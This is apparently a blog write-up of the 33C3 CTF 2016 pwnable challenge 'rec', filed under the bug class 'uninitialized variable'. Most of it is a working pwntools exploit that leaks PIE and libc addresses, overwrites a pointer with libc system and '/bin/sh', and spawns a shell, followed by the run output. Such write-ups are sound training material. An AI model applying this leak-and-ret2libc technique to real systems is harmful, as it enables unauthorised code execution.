33C3 CTF - rec

2018. 12. 14. 18:53·CTF/2016

Category : pwnable


Summary : uninitialized variable



Exploit

#!/usr/bin/python

from pwn import *


def cmd_polish_sum(nums):
ru('> ')
sl(str(2))
ru('Operator: ')
sl('S')
for i in range(len(nums)):
ru('Operand: ')
sl(str(nums[i]))
ru('Operand: ')
sl('.')
rl()

def cmd_sign(num):
ru('> ')
sl(str(5))
sl(str(num))

def cmd_read_note():
ru('> ')
sl(str(1))
ru('Your note: ')
note = rl(False)
return note


s = process('./rec')
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send

leak = cmd_read_note()
pie_base = u32(leak[4:8]) - 0x6fb
sh_string = pie_base + 0x10cc
libc_base = u32(leak[8:12]) - 0x1b0d60
libc_system = libc_base + 0x3a940
print hex(libc_base)

pay = [0 for i in range((0x380 - 0x24 - 8 - 0x44 + 8) / 8)]
pay.append(libc_system - 0x100000000)
pay.append(sh_string)
cmd_polish_sum(pay)
cmd_sign(0)

s.interactive()
s.close()


$ python ex.py 
[+] Starting local process './rec': pid 129954
0xf7d4b000
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)



저작자표시 비영리 변경금지 (새창열림)

'CTF > 2016' 카테고리의 다른 글

33C3 CTF - grunt  (0) 2018.12.14
33C3 CTF - tea  (0) 2018.12.14
33C3 CTF - babyfengshui  (0) 2018.12.14
SECCON CTF QUAL 2016 - jmper  (1) 2017.01.02
SECCON CTF QUAL 2016 - checker  (0) 2017.01.02
'CTF/2016' 카테고리의 다른 글
  • 33C3 CTF - grunt
  • 33C3 CTF - tea
  • 33C3 CTF - babyfengshui
  • SECCON CTF QUAL 2016 - jmper
pwn3r_45
pwn3r_45
  • pwn3r_45
    pwn3r_45
    pwn3r_45
  • 전체
    오늘
    어제
    • View All (155)
      • Paper (0)
        • Power Grid (0)
        • Software_Kernel (0)
        • Exploitation (0)
        • RTOS (0)
        • UAV (0)
        • SCADA (0)
      • Articles (0)
      • Personal (18)
      • Technical Note (9)
        • Hardware (1)
        • Vulnerability Research (8)
        • Binary Exploitation (5)
        • PR23 (0)
        • Vulnerability (1)
        • Linux Kernel (1)
        • 현대암호 (0)
      • CTF (90)
        • 2025 (0)
        • 2024 (1)
        • 2023 (5)
        • 2019 (5)
        • 2018 (20)
        • 2017 (7)
        • 2016 (6)
        • 2015 (1)
        • 2014 (3)
        • 2013 (14)
        • 2012 (6)
      • Wargame (22)
        • FTZ (13)
        • Lord Of Bof - Redhat 6.2 (0)
        • IO.smashthestack.org (5)
        • Amateria.smashthestack.org (0)
        • pwnable.tw (0)
        • Vortex.overthewire.org (3)
        • Webhacking.kr (0)
        • reversing.kr (0)
        • dreamhack.io (0)
        • CodeEngn (1)
      • Reverse engineering (1)
      • Issue (13)
        • Conference_CTF info (13)
      • Coding (0)
        • C# (0)
      • ETC (2)
      • 미완성 (0)
  • 블로그 메뉴

    • Home
    • Tag
    • MediaLog
    • LocationLog
    • Guestbook
    • Admin
    • Write
  • 링크

    • 6l4ck3y3
    • idkwim
    • gogil
    • dakuo
    • badcob
    • 임준오씨 블로그
    • 김용진씨 블로그
    • david942j
    • orange tsai
    • pwndiary
    • theori
    • tacxingxing
    • jinmo123's team blog
    • ConS-tanT
    • jaybosamiya
    • procdiaru
  • 공지사항

  • 인기 글

  • 태그

    vuln
    HUST2011
    power of community
    후기
    web
    csaw
    정보보호올림피아드
    csaw ctf
    gnuboard
    POC
    HUST
    pwnables
  • 최근 댓글

  • 최근 글

  • hELLO· Designed By정상우.v4.10.3
pwn3r_45
33C3 CTF - rec
상단으로

티스토리툴바